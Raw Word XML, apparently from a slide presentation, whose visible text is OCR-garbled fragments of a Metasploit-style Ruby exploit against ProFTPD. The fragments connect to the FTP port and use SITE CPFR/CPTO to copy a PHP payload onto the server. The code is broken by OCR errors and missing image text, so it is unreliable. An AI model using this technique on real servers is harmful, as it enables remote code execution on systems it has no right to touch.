            <w:tcW w:w="7170" w:type="dxa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5480632E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="545FB3F9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="855"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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F806738" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="255"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="70"/>
              </w:rPr>
              <w:t>4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5C04BADD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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3C81A33A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="424CC228" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1378"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853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7688315E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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61DAE226" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc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2522C783" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15C16302" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1464" w:right="17535"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="081817A2" wp14:editId="1F4F69EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11572875</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5000625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="390525" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="130060" name="Picture 130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0" name="Picture 130060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449FC59F" wp14:editId="406D4FC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1104900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>6562725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10010775" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="340774" name="Group 3407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10775" cy="19050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10010775" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340773" name="Shape 340773"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="100107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10775" h="19050">
                                <a:moveTo>
                                  <a:pt x="0" y="9525"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10010775" y="9525"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="190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40774" style="width:788.25pt;height:1.5pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:87pt;mso-position-vertical-relative:page;margin-top:516.75pt;" coordsize="100107,190">
                <v:shape id="Shape 340773" style="position:absolute;width:100107;height:190;left:0;top:0;" coordsize="10010775,19050" path="m0,9525l10010775,9525">
                  <v:stroke weight="1.5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</w:p>
    <w:p w14:paraId="36FFFB79" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId93"/>
          <w:headerReference w:type="default" r:id="rId94"/>
          <w:footerReference w:type="even" r:id="rId95"/>
          <w:footerReference w:type="default" r:id="rId96"/>
          <w:headerReference w:type="first" r:id="rId97"/>
          <w:footerReference w:type="first" r:id="rId98"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1348" w:right="1665" w:bottom="180" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155F3032" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="3C99AE01" wp14:editId="6EB51EBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340775" name="Picture 3407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75" name="Picture 340775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FC89C77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="3569830B" wp14:editId="2BD50800">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340777" name="Picture 3407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77" name="Picture 340777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E278B2C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="26A0BB06" wp14:editId="7F33928B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340779" name="Picture 3407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79" name="Picture 340779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E130042" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="7889D5A1" wp14:editId="5AD57A7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340781" name="Picture 3407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81" name="Picture 340781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DC5B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId103"/>
          <w:headerReference w:type="default" r:id="rId104"/>
          <w:footerReference w:type="even" r:id="rId105"/>
          <w:footerReference w:type="default" r:id="rId106"/>
          <w:headerReference w:type="first" r:id="rId107"/>
          <w:footerReference w:type="first" r:id="rId108"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="233" w:footer="1110" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37959F05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1440" w:right="17760"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="17436" w:type="dxa"/>
        <w:tblInd w:w="-461" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="98" w:type="dxa"/>
          <w:left w:w="53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28"/>
        <w:gridCol w:w="17033"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6273B312" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="504"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829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0202517F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660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DFD1DF9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="6429" w:hanging="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>def exploit ftp_port = datastore[ ' RPORT_FTP' get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + ' .php'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="32B327E9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829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14:paraId="0BA9B3AD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="74"/>
              </w:rPr>
              <w:t>5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085EAA2D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="62AD467B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa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1E0EEBE4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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7C3FED" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2430EB1D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1650"/>
        </w:trPr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2C75BF4A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660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3C385539" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="3294" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">sock = Rex: : Socket. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC94176" wp14:editId="25E13837">
                  <wp:extent cx="752475" cy="161925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173882" name="Picture 1738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882" name="Picture 173882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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C36627B" wp14:editId="5D6CF3FB">
                  <wp:extent cx="85725" cy="95250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173783" name="Picture 1737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83" name="Picture 173783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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D8C238" wp14:editId="119FB69D">
                  <wp:extent cx="85725" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173782" name="Picture 1737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82" name="Picture 173782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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="372D5776" wp14:editId="61812D12">
                  <wp:extent cx="57150" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173781" name="Picture 1737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81" name="Picture 173781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8"/>
              </w:rPr>
              <w:t xml:space="preserve">'PeerHost' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost, ' PeerPort '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>ftp_port) if sock. nil?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582A2F4B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3653"/>
                <w:tab w:val="center" w:pos="11333"/>
              </w:tabs>
              <w:spacing w:after="178"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>fail_with(Fai1ure: : Unreachable,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost} :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AAF843" wp14:editId="4102EB52">
                  <wp:extent cx="1143000" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173883" name="Picture 1738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883" name="Picture 173883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2"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failed to connect to FTP server")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656523F0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="514" w:line="227" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="4794" w:firstLine="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>print_ status( rhost}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280A7F7C" wp14:editId="35C97198">
                  <wp:extent cx="1209675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173884" name="Picture 1738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884" name="Picture 173884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4"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Connected to FTP server") end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7420AA44" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="639" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C179AE1" wp14:editId="009D683C">
                  <wp:extent cx="1152525" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173885" name="Picture 1738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885" name="Picture 173885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2"/>
              </w:rPr>
              <w:t xml:space="preserve"> le) unless res &amp;&amp; res. include? ('220' ) fail_with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31B465A5" wp14:editId="70AC25FC">
                  <wp:extent cx="2171700" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="173886" name="Picture 1738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886" name="Picture 173886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2"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failure retrieving ProFTPD OK banner") end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="75650EEE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2490"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa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03B88D7B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:t>6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186845" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="547773BE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1084"/>
        </w:trPr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40FAC7EE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660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D4DEE2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="-426"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173A1EFC" wp14:editId="2BC3711B">
                  <wp:extent cx="10782300" cy="2066925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340783" name="Picture 3407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783" name="Picture 340783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230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F0C" w14:paraId="13D55819" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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5A032BE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="199"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>7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6DC75A05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="29AD616F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1078"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="829" w:type="dxa"/>
            <w:vMerge w:val="restart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7AA1684F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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2B8581" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2F42C846" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="54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7B7FA24F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607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6A82995F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3009FB73" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="03D6DE32" wp14:editId="6516DF48">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340785" name="Picture 340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85" name="Picture 340785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A003256" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="3980B30F" wp14:editId="1962217D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340787" name="Picture 340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87" name="Picture 340787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497D2A0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33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0" wp14:anchorId="64AB867C" wp14:editId="2353273A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340789" name="Picture 340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89" name="Picture 340789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78259C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId118"/>
          <w:headerReference w:type="default" r:id="rId119"/>
          <w:footerReference w:type="even" r:id="rId120"/>
          <w:footerReference w:type="default" r:id="rId121"/>
          <w:headerReference w:type="first" r:id="rId122"/>
          <w:footerReference w:type="first" r:id="rId123"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1348" w:right="1440" w:bottom="480" w:left="1440" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="-600" w:tblpY="-6036"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="17499" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="202" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="211" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="915"/>
        <w:gridCol w:w="9390"/>
        <w:gridCol w:w="7194"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="367E351F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="688"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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0F479137" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="939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479A9FA8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="810"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put( "SITE CPTO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">'TMPPATH' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">.&lt;?php res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EBBE1C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="795" w:right="1079"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('250' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4814B04A" wp14:editId="5CBBE704">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202175" name="Picture 2021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175" name="Picture 202175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0"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa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1BE8F5FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4020"/>
                <w:tab w:val="center" w:pos="4185"/>
                <w:tab w:val="center" w:pos="5325"/>
              </w:tabs>
              <w:spacing w:after="381"/>
              <w:ind w:left="-180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9A6004" wp14:editId="506251F1">
                  <wp:extent cx="2600325" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202225" name="Picture 2022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225" name="Picture 202225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66EE783E" wp14:editId="6587DFBA">
                  <wp:extent cx="95250" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202178" name="Picture 2021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178" name="Picture 202178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289ED06B" wp14:editId="6FAE5749">
                  <wp:extent cx="76200" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202176" name="Picture 2021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176" name="Picture 202176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0E577120" wp14:editId="4B9B97CA">
                  <wp:extent cx="76200" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202177" name="Picture 2021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177" name="Picture 202177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' ] ) ;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1AFEF2" wp14:editId="45B3463B">
                  <wp:extent cx="781050" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202226" name="Picture 2022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226" name="Picture 202226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31BF21" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t>- Failure copying to temporary file")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6436F369" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1434"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa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14:paraId="22C8C1D4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="2377"/>
              <w:ind w:left="315"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="70"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC09425" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="72"/>
              </w:rPr>
              <w:t>9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190016C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc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337680C6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4170C4F7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2826"/>
        </w:trPr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2B24E7ED" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="939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41E22E56" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="30" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="810"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put("SITE CPFR </w:t>
